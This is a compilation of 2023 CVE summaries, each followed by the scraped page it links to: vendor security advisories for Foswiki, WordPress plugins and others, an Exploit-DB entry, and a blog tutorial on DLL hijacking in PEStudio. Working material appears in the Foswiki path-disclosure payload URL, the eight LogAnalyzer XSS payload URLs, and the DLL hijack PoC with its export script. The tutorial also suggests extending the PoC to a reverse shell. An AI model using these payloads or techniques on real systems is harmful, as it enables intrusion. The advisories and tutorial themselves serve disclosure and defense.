Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in a2 License Portal System allows SQL Injection.This issue affects License Portal System: before 1.48.



CVE-2023-3522

PHPJabbers Class Scheduling System 1.0 lacks encryption on the password when editing a user account (update user page) allowing an attacker to capture all user names and passwords in clear text.

Organize course schedules on your site and manage online bookings!

Version: 1.0

Our PHP-based class booking system is a great asset for all websites that announce various courses and seminars – foreign languages, crafts, business skills, musical instruments, etc. Once installed on your site, the course booking software will enable you to customize classes, add multiple teacher profiles, coordinate events between participants, manage bookings, and process payments. The smart user login system allows teachers and students to access and edit their personal details and keep track of their lesson plans.

**Class Scheduling System**

*   Highlights
*   Features
*   Demo
*   Faq
*   Pricing

**Product Highlights**

Enhance your education and training business by integrating an intelligent course scheduling system into your website! Add as many classes as you need and present them in an attractive way to potential students. Invite the best teachers and make them familiar to the students in advance. The PHPJabbers class scheduling software is perfect for any educational institution – higher education, language schools, professional training, online classes, etc.

Add Multiple Classes

Customize each course by adding a detailed description, catchy image, maximum number of attendees, price, and available dates.

Receive Payments

The class scheduling software supports various payment gateways – PayPal and Authorize.net are integrated by default. Request other payment methods

Manage Class Schedules

After adding classes and lecturers, you can create your class schedule by setting the exact date, time, and venue for each course.

Student Profiles

After enrolling for a course, each student can access their account, edit personal details, and check time plans and payments.

Teacher Profiles

Each class can be assigned to one or more teachers. Introduce them by adding a short bio, key expertise, and photo to their profile.

Responsive Design

The front-end UI of our online Class Scheduling System is mobile-friendly. You can switch between 10 color themes to match your website branding.

Take Online Bookings

Process and manage course reservations through your website. You can review all bookings at a glance and quickly change their status.

Customizable PHP Source Code

Buy the online course booking system with a Developer License and make your own custom modifications to the PHP source code! Compare licenses

SPECIAL OFFER

**Class Scheduling System for $4.29 Only**

Get all 65 PHPJabbers scripts in a bundle for just $299.

**Live Demo**

Preview both the front end and back end of the class booking system and test out the whole functionality.  
If you have any questions or need technical advice, go ahead and contact us.

**Class Scheduling System**

**Key Benefits**

Customizations

Extended Licence

High Performance

Payment Gateways

Remote Hosting

**Pricing**

You can buy the class scheduling software both with a Developer and a User License – compare them below.  
Do you need a custom modification? We'll happily do it for you! Just contact us, describe what you need, and we'll send you a quote!

Mega Sale deal

$4.29

per script

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Contact us and you'll receive quotation for the custom changes you may need

buy now

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

Mega Sale deal

$4.29 per script

Get 65 PHP Scripts

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

LIMITED OFFER

Get the Mega Sale bundle deal with all the PHP scripts you'll ever need for a total of

$299

VIEW DETAILS

**Testimonials**

Let our clients share their experience with our online course booking system and how the scheduling solution has improved their online business.

“

You guys are awesome! Your support is fast, you have integrity, and try to provide the best solution for the customer. I like it!

Jeff P. Emerson

“

Harford Christian is a very busy k-12 school with athletic team practices and games, fine arts practices and performances and many other special events throughout the year. The two PHP monthly calendars on the school site have performed flawlessly and allowed us the flexibility to change things daily and from any computer or mobile device. We have also been able to grow our categories and make them color coded for easy reference. I don't know what the organization would do without it.

Donna Sichette

“

PHPJabbers reservation software is extraordinary, everything works out of the box, setting options provide absolute flexibility for every thing you could think of. Customer service is world class. They are absolutely reliable and we will definitively continue making business with them.  
"European Association of technical, legal and scientific translators".

Alvaro Escalada

**FAQ & Knowledge Base**

Pre-Sale FAQ

Read the most Frequently Asked Questions about this script, its features and use.

Support Service FAQ

Read more about our Support Service and how we can help you install Class Scheduling System.

Custom Mods FAQ

Do you need something changed? We offer customization services.

How to install a Script

See how easy it is to install the script. Just follow the instructions or leave it all to us.

FTP Clients

See how to upload our scripts using different FTP clients.

PHP Framework Used

We use our own in-house build framework which is really easy to understand and work with.

Our Services

We offer a wide range of web development       services.

License Types Explained

User and Developer licence available. We also have a special Extended Licence for webmasters.

Didn’t find exactly what you were looking for?

Contact Us

**Related Scripts**

**Appointment Scheduler**

$69 / $129

**Event Booking Calendar**

$49 / $79

**Service Booking Script**

$49 / $99

**Meeting Room Booking System**

$69 / $129

**Conference Agenda Software**

$39 / $69

**Event Ticketing System**

$49 / $99

CVE-2023-36136: Class Scheduling System | Course Booking System

An issue in the SpreadSheetPlugin component of Foswiki v2.1.7 and below allows attackers to execute a directory traversal.

 plain text

**Security Alert: SpreadSheetPlugin's EVAL feature exposes infromation about paths and files on the server**

 **_Get Alerted:_** _to get immediate alerts_ of high priority security issues, please join the low-volume foswiki-announce list - details at MailingLists

By abusing the SpreadSheetPlugin EVAL feature, it is possible to gain infromation about paths and files on the server.

*   Severity Level
*   MITRE Name for this Vulnerability
*   Vulnerable Software Versions

**Severity Level**

Severity 1 issue: The web server can be compromised

The severity level was assigned by the Foswiki SecurityTaskTeam as documented in SecurityAlertProcess

**MITRE Name for this Vulnerability**

The Common Vulnerabilities and Exposures project has assigned the name CVE-2023-33756 to this vulnerability.

**Vulnerable Software Versions**

*   Foswiki 1.0.0, Foswiki 1.0.0-beta1, Foswiki 1.0.0-beta2, Foswiki 1.0.0-beta3, Foswiki 1.0.1, Foswiki 1.0.2, Foswiki 1.0.3, Foswiki 1.0.4, Foswiki 1.0.5, Foswiki 1.0.6, Foswiki 1.0.7, Foswiki 1.0.8, Foswiki 1.0.9, Foswiki 1.0.9-rc1, Foswiki 1.0.9-RC2, Foswiki 1.0.10, Foswiki 1.0.10-rc1, Foswiki 1.1.0, Foswiki 1.1.0-beta1, Foswiki 1.1.0-RC1, Foswiki 1.1.1, Foswiki 1.1.2, Foswiki 1.1.3, Foswiki 1.1.3-RC1, Foswiki 1.1.4, Foswiki 1.1.4-RC2, Foswiki 1.1.5, Foswiki 1.1.6, Foswiki 1.1.7, Foswiki 1.1.8, Foswiki 1.1.9, Foswiki 1.1.10, Foswiki 1.1.10-RC1, Foswiki 1.2.0\_Beta\_1, Foswiki 1.2.0\_Beta\_2, Foswiki 2.0.0, Foswiki 2.0.0-RC1, Foswiki 2.0.0-RC2, Foswiki 2.0.1, Foswiki 2.0.2, Foswiki 2.0.3, Foswiki 2.1.0, Foswiki 2.1.0-Beta1, Foswiki 2.1.1, Foswiki 2.1.1-RC1, Foswiki 2.1.1-RC2, Foswiki 2.1.2, Foswiki 2.1.3, Foswiki 2.1.3-Beta1, Foswiki 2.1.3-Beta2, Foswiki 2.1.3-RC1, Foswiki 2.1.4, Foswiki 2.1.4-RC1, Foswiki 2.1.4-RC2, Foswiki 2.1.4-RC3, Foswiki 2.1.5, Foswiki 2.1.5-RC, Foswiki 2.1.6, Foswiki 2.1.7

Fixed in Foswiki 2.1.8

**Attack Vectors**

The EVAL feature of the plugin allows simple evaluation of formulas which are passed to the perl eval function. While there is filtering in place, the use of <, >, \*, /, . and e allows to make statements such as the following: <\*>. This statement returns the filename of the first file in the current directory. This basically is evaluating a perl file glob.

This can be combined with the path traversal sequence ../ to get the first file in all directories from the installation folder up to the root folder. Furthermore, the regexes in place substitute the string "ee" with a single "e", which allows attackers to disclose the first file in a folder starting with the letter "e". For example:

https://<target>/bin/view/System/SpreadSheetPlugin?formula=%24EVAL%28%24CHAR%2860%29../../../ee\*/\*+%24CHAR%2862%29%29

While the use of % also allows access to hashmaps, we were not able to leverage it to access anything other than the current module name.

**Impact**

An attacker can gain information about the server such as paths or files.

**Details**

No prerequisites are necessary, as the demo page is accessible without authentication.

**Countermeasures**

*   Apply hotfix to Calc.pm.
*   Restrict unauthorized access to the System.SpreadSheetPlugin topic.
*   Upgrade to the latest patched production FoswikiRelease02x01x08.

Abian Manuel Blome
Siemens Energy Global GmbH & Co. KG
Siemens Energy
Cybersecurity
Technologies
SE CYS A&R TEC
Otto-Hahn-Ring 6
81739 Munich, Germany

**Action Plan with Timeline**

*   2023-05-17: email from Abian Manuel Blome
*   2023-05-17: first hotfix checked in to 2.1x and master branches
*   2023-05-17: filed a CVE-request
*   2023-05-17: updated hotfix multiple times
*   2023-05-17: applied hotfix to foswiki.org and blog.foswiki.org
*   2023-05-22: updated hotfix based on Abian's feedback
*   2023-05-23: reworked patch to trap any globbing within an $EVLA() expression
*   2023-05-31: CVE-2023-33756 was assigned
*   2023-08-06: fix released in Foswiki-2.1.8

CVE-2023-33756: SecurityAlert-CVE-2023-33756 < Support < Foswiki

Insufficient parameter validation in the Foswiki::Sandbox component of Foswiki v2.1.7 and below allows attackers to perform a directory traversal via supplying a crafted web request.

*   About
*   Blog
*   Extensions
*   Documentation
*   Community
*   Development
*   Tasks
*   Download
*   Support
*   Sandbox

 plain text

**Security Alert: Local file inclusion vulnerability in viewfile**

 **_Get Alerted:_** _to get immediate alerts_ of high priority security issues, please join the low-volume foswiki-announce list - details at MailingLists

The filename parameter isn't validated sufficiently and may be used to read any file on the server.

*   Severity Level
*   MITRE Name for this Vulnerability
*   Vulnerable Software Versions

**Severity Level**

Severity 1 issue: The web server can be compromised

The severity level was assigned by the Foswiki SecurityTaskTeam as documented in SecurityAlertProcess

**MITRE Name for this Vulnerability**

The Common Vulnerabilities and Exposures project has assigned the name CVE-2023-24698 to this vulnerability.

**Vulnerable Software Versions**

*   Foswiki 2.0.0, Foswiki 2.0.0-RC1, Foswiki 2.0.0-RC2, Foswiki 2.0.1, Foswiki 2.0.2, Foswiki 2.0.3, Foswiki 2.1.0, Foswiki 2.1.0-Beta1, Foswiki 2.1.1, Foswiki 2.1.1-RC1, Foswiki 2.1.1-RC2, Foswiki 2.1.2, Foswiki 2.1.3, Foswiki 2.1.3-Beta1, Foswiki 2.1.3-Beta2, Foswiki 2.1.3-RC1, Foswiki 2.1.4, Foswiki 2.1.4-RC1, Foswiki 2.1.4-RC2, Foswiki 2.1.4-RC3, Foswiki 2.1.5, Foswiki 2.1.5-RC, Foswiki 2.1.6, Foswiki 2.1.7

Fixed in Foswiki 2.1.8

**Attack Vectors**

A proof of concept isn't included here for security reasons. The attack can be scripted using curl. The POC submitted by Steffen Weinreich allowed to read /etc/passwd but basically any file could be accessed such as lib/LocalSite.cfg containing sensitive information like passwords and configiration details.

**Impact**

Any file accessible by the user running the foswiki services (e.g. www-data) can be accessed using a specially crafted http request to the viewfile endpoint.

**Details**

The filename parameter isn't validated sufficiently in Foswiki::Sandbox Basically any component using Foswiki::Sandbox::validateAttachmentName will be affected, not only viewfile. Yet viewfile is the most obvious vector.

**Countermeasures**

*   Apply hotfix in Tasks.Item15163
*   Upgrade to the latest patched production FoswikiRelease02x01x08.

*   Steffen Weinreich <steve@weinreich.org>

**Action Plan with Timeline**

*   2022-08-05: Michael Daum was contacted by Steffen Weinreich <steve@weinreich.org>
*   2022-08-05: The POC was confirmed and the bug was analysed
*   2022-08-05: a preliminary patch was applied to foswiki.org and blog.foswiki.org to secure the system
*   2022-08-05: hotfix made available, security ML was informed
*   2022-08-06: updated hotfix
*   2022-10-22: CVE Request 1349733 for CVE ID Request ... first attempt
*   2023-01-26: CVE Request 1397709 for CVE ID Request ... second attempt
*   2023-03-08: CVE-2023-24698 approved
*   2023-08-06: fix released in Foswiki-2.1.8

Topic revision: r3 - 06 Aug 2023, MichaelDaum

CVE-2023-24698: SecurityAlert-CVE-2023-24698 < Support < Foswiki


A vulnerability was discovered in the Rockwell Automation Armor PowerFlex device when the product sends communications to the local event log. Threat actors could exploit this vulnerability by sending an influx of network commands, causing the product to generate an influx of event log traffic at a high rate. If exploited, the product would stop normal operations and self-reset creating a denial-of-service condition. The error code would need to be cleared prior to resuming normal operations.



Skip Navigation

menu

*   Support Center
*   Get Support Chat & Submit a Question Phone Support Holiday Schedule
*   Training & Webinars
*   Online Forum
*   Customer Care Customer Care Overview Phone Support Holiday Schedule

Sign In

Quickly log in or create an account using an existing service

Yahoo

What will happen: When you click on this button you will be taken to Yahoo. Once you log in, Yahoo will verify you and send you back here where you'll be logged in!

Log In or Create an AccountOpens new dialog

Please log in to continue, Username Password

Email Address \*

Username \*

Password

Re-enter a value for the field 'Password'

Must match Password

First Name \*

Last Name \*

Forgot your username or password?

The page will refresh upon submission. Any pending input will be lost.

Current product hierarchy

1.  Drives
2.  Low Voltage Drives

ID: PN1637 | Access Levels: Everyone

**Search**

Did you mean:

**Published Date**Published Date 08/08/2023

**Login Required to View Full Answer Content**

Please use the 'Sign In' button above

CVE-2023-2423: Armor ™ PowerFlex ® Critical Fault Vulnerability

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Digital Ant E-Commerce Software allows SQL Injection.This issue affects E-Commerce Software: before 11.



CVE-2023-3651

A Cross Site Scripting (XSS) vulnerability in Adiscon Aiscon LogAnalyzer through 4.1.13 allows a remote attacker to execute arbitrary code via the asktheoracle.php, details.php, index.php, search.php, export.php, reports.php, and statistics.php components.

    # Exploit Title: Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting
    # Date: 2023.Aug.01
    # Exploit Author: Pedro (ISSDU TW)
    # Vendor Homepage: https://loganalyzer.adiscon.com/
    # Software Link: https://loganalyzer.adiscon.com/download/
    # Version: v4.1.13 and before
    # Tested on: Linux
    # CVE : CVE-2023-36306
    
    There are several installation method.
    If you installed without database(File-Based),No need to login.
    If you installed with database, You should login with Read Only User(at least)
    
    XSS Payloads are as below:
    
    XSS
    http://[ip address]/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
    http://[ip address]/loganalyzer/chartgenerator.php?type=2&byfield=syslogseverity&width=400&%%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E=123
    http://[ip address]/loganalyzer/details.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
    http://[ip address]/loganalyzer/index.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
    http://[ip address]/loganalyzer/search.php/%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
    http://[ip address]/loganalyzer/export.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
    http://[ip address]/loganalyzer/reports.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
    http://[ip address]/loganalyzer/statistics.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E

CVE-2023-36306: OffSec’s Exploit Database Archive

An issue in PEStudio v.9.52 allows a remote attacker to execute arbitrary code via a crafted DLL file to the PESstudio exeutable.

Lately, I have reported multiple DLL Hijacking vulnerabilities. These are quite straightforward, yet quite impactful. Thus, I thought of sharing some theory as well as a practical example of DLL Hijacking (how exciting, right?). This is YADHA (Yet Another DLL Hijacking Article)!

1.  DLL Hijacking Theory
    1.  Let’s Look at the Win32 API LoadLibraryA Function
2.  How to Find DLL Hijacking Vulnerabilities?
3.  Creating the Exploit
4.  Impact

**DLL Hijacking Theory**

In the simplest terms, DLL Hijacking, also known as DLL side-loading, is an attack that exploits the way Windows searches for and loads DLL files, allowing an attacker to replace a legitimate DLL with a malicious one, leading to unauthorized code execution. This can happen due to various reasons, such as:

*   Incorrect DLL search order: Windows searches for DLLs in specific locations, such as the current directory or system folders. If an application does not specify the DLL’s full path, an attacker can place a malicious DLL in a directory with higher search priority, leading to the hijacking.

*   Weak or missing DLL loading safeguards: Applications may not implement sufficient security measures to validate the integrity and authenticity of DLL files, making them susceptible to substitution by malicious counterparts.

**Let’s Look at the Win32 API LoadLibraryA Function**

LoadLibraryA loads the specified module into the address space of the calling process. The specified module may cause other modules to be loaded (see https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya).

The screenshot above, highlights the essence of the issue by noting that if the string specifies a full path, the function searches only that path for the module, however, if the string specifies a relative path or a module name without a path, the function uses a standard search strategy to find the module. This is interesting, because it highlights a neat fix to the DLL Hijacking issue – specifying full paths to the modules.

This article (https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-security) gives us some more insight into the load order. Assuming safe DLL search mode is enabled and the application is not using an alternate search order, the system searches directories in the following order:

1.  The directory from which the application loaded.
2.  The system directory.
3.  The 16-bit system directory.
4.  The Windows directory.
5.  The current directory.
6.  The directories that are listed in the PATH environment variable.

In other words, if the DLL is located in the directory form which the application is loaded, the application will stop searching the other directories for the module. Thus, if we can write to the search directories, we can manipulate the DLLs which are loaded.

**How to Find DLL Hijacking Vulnerabilities?**

Feel free to follow along with this section!

Let’s take the example of PEStudio 9.52. We can download PEStudio 9.52 from the following link: https://www.winitor.com/download2. In order to find DLL Hijacking vulnerabilities, we will need Procmon – a fantastic utility which is part of Microsoft’s SysInternals Suite (https://download.sysinternals.com/files/SysinternalsSuite.zip).

With our vulnerable application (PEStudio 9.52) and our tools (SysInternals Suite) downloaded, we are ready to start! The first step is to run Procmon64.exe and set the following filters:

We are looking for DLLs which are attempted to be loaded by pestudio.exe and are not found. Now that we started capturing using the filters above, we can start PEStudio. It isn’t long before we get the following results in Procmon:

This indicates that the 6 DLLs are attempted to be loaded from the directory from which the application is loaded. Let’s take sensapi.dll as an example for further inspection – by changing the _Path ends with_ filter from “.dll” to “sensapi.dll”. We now find that pestudio.exe tries to load sensapi.dll from the directory from which the application is loaded, fails, and then loads it from System32.

Thus, if we are able to write our own malicious version of sensapi.dll into the pestudio folder, we may be able to run arbitrary commands on the system.

**Creating the Exploit**

Let’s take the following Proof of Concept C code (dll\_hijack.c):

    #include <windows.h>
    #pragma comment (lib, "user32.lib")
    
    BOOL APIENTRY DllMain(HMODULE hModule,  DWORD  ul_reason_for_call, LPVOID lpReserved) {
        switch (ul_reason_for_call)  {
        case DLL_PROCESS_ATTACH:
          MessageBox(
            NULL,
            "DLL Hijack!",
            "PoC",
            MB_OK
          );
          break;
        case DLL_PROCESS_DETACH:
          break;
        case DLL_THREAD_ATTACH:
          break;
        case DLL_THREAD_DETACH:
          break;
        }
        return TRUE;
    }

This piece of code should generate a message box. Of course, this is a benign PoC, however, the potential for malicious code is only limited by the attacker’s imagination.

Let’s also create the following Python script (dll\_def.py):

    import pefile
    import sys
    import os.path
    
    dll = pefile.PE(sys.argv[1])
    dll_basename = os.path.splitext(sys.argv[1])[0]
    
    try:
        with open(sys.argv[1].split("/")[-1].replace(".dll", ".def"), "w") as f:
            f.write("EXPORTS\n")
            for export in dll.DIRECTORY_ENTRY_EXPORT.symbols:
                if export.name:
                    f.write('{}={}.{} @{}\n'.format(export.name.decode(), dll_basename, export.name.decode(), export.ordinal))
    except:
        print ("Failed to create .def file :(")
    else:
        print ("Successfully created .def file :)")

The Python script was inspired by https://cocomelonc.github.io/pentest/2021/10/12/dll-hijacking-2.html. The script enumerates the exported functions from a DLL. The reason for this will soon become clear.

We must first find the original DLL and transfer it to our attack box.

Then, we must find the functions exported by the initial DLL and create a .def file using the Python scrip shared above. We must use this .def file when compiling our C PoC, because otherwise there is a chance that our DLL will not be loaded due to missing procedures or entry points. After cross compiling the DLL (we are creating a Windows-specific file on a Linux system), we must transfer the resulting DLL onto the Windows system.

We then place poc.dll into the same folder as pestudio.exe and rename it to sensapi.dll. Now, when we run pestudio.exe, we see that our DLL was loaded and generated a message box. Once we click OK, pestudio runs normally.

**Impact**

Generally speaking, DLL Hijacking can allow attackers to run arbitrary commands on the victim’s system. In some cases, DLL Hijacking is used for privilege escalation, however, this is not the case for PEStudio, because I don’t see any reason to run PEStudio as admin. Nevertheless, application developers should take security into account and provide full paths to loaded modules in order to avoid these types of attacks. I encourage you to try to exploit this vulnerability in PEStudio to cause a reverse shell or create a user, but also to try to find these types of vulnerabilities in other applications, as I get the sense that there are a lot more of them than reported.

CVE-2023-36546: DLL Hijacking – Finding CVE-2023-36546 in PEStudio 9.52

Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Ransom Christofferson PDQ CSV plugin <= 1.0.0 versions.

**Solution**

 No fix

No patched version is available. No reply from the vendor.

Gaurav Bhosale discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress PDQ CSV Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-31221: WordPress PDQ CSV plugin <= 1.0.0 - Cross Site Scripting (XSS) vulnerability - Patchstack

Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in VillaTheme WPBulky plugin <= 1.0.10 versions.

**Solution**

 Fixed

Update the WordPress WPBulky plugin to the latest available version (at least 1.0.10).

Abde Ouabala discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress WPBulky Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 1.0.10.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more